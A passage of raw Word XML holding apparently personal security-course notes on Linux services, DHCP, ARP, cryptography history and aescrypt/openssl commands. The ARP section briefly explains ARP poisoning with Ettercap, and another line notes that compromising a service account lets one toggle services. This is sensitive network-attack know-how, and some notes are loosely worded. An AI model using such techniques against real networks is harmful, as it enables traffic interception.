      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>init.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005115BB" w:rsidRPr="005115BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Shows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all of possible services that can run on Linux machine. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not mean they're all on and listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Altering Services status needs to have Admin </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as they run as a different user </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>han the one you're logged on</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. However, if you can compromise the services user then it is possible to switch them on or off. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows uses a </w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F00288">
        <w:t>system.</w:t>
      </w:r>
      <w:r>
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F00288">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account for loads of things rather than individual services accounts like in Linux. Easie</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">r to compromise loads of stuff if this account is compromised. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**D</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">ynamic </w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">ost </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">ontrol </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>rotocol - DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allows </w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">networked </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devices to pick up their configuration </w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">automatically </w:t>
      </w:r>
      <w:r>
        <w:t>when they connect</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> to the network. Although handy from an administrator’s point of view, it obviously has its downsides including </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">possible security breaches. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Easy to set-up and configure. Allows users to be more mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can be configured to provide Default Gateway, DNS, DHCP Exclusions, Lease time, DHCP rules. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00288" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>DORA</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Offer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Acknowledgement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Known as BOOTP in Wireshark. Bootstrap was the original protocol to DHCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**A</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">ddress </w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">esolution </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>rotocol - ARP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ARP Table matches a</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> physical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> L2 address</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve">, MAC, </w:t>
      </w:r>
      <w:r>
        <w:t>to an IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F00288">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F00288">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- Shows the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Gratuitous ARP are normally saved for later just in case so that they don't need to ask.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F00288">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ETTERCAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can take advantage of this by </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00288">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ARP poisoning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sends out hundreds/thousands gratuitous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> messages to flood network and poison the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F00288">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> tables.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**History of Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Caesar Cipher is a rotation cipher. The 2nd row is shifted X amount of characters to make an encrypted message</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ABCDEF.....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>DEFGHI.....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enigma Cipher. ww2. German developed cipher. Alan Turing</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> worked tirelessly to try and crack this cipher at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bletchley Park. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Digital Encryption Standard</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>, DES -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t>1977 IBM came up with an algori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thm based on Lucifer cipher. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Became</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST DES. 3DES came next.</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> 56bit encryption. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3DES, uses 3</w:t>
      </w:r>
      <w:r w:rsidR="00F00288">
        <w:t xml:space="preserve"> DES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys. First key used to encrypt the plaintext. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Second</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key used to decrypt the </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>cipher text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from first </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>round then the t</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>hird</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">used to encrypt the </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">text from the second key. This equates to </w:t>
      </w:r>
      <w:r>
        <w:t>168 b</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>it encryption although in reality it’s 3x 56 bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> 2001 NIST replaced this wi</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>th Advanced Encryption Standard,</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> AES. Supports multiple key lengths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Different Types of Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Symmetric</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> key cryptography uses the same key to encrypt and decrypt the data. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>AES and DES</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> are examples of symmetric key encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>aescrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -e -p cookie text.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- encrypts text.txt file with </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">the password cookie and makes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC76F1">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t>.aes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file extension. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>aescrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -d -p cookie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>text.text.aes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-- decrypts the text file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Block cipher or Stream cipher</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Block </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">cipher </w:t>
      </w:r>
      <w:r>
        <w:t>literally encrypt in block of ex. 64 bits. Stream encrypts bit b</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">y bit as it is being processed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A-</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>symmetric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encryption is slower, but better. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Private </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Public keys. Ensure that who you got it from is who actually sent it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hybrid</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> methods</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>are often</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used in real-world situations. A-</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>symmetric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used to transmit the </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>symmetric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>genrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -des3 -out </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>private.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4096</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- generates the private key</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> with 4096 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC76F1">
        <w:t>encyrption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> a passphrase: XXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>private.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pubout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -out </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>public.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> passphrase: XXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rsautl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -encrypt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pubin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>inkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>public.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
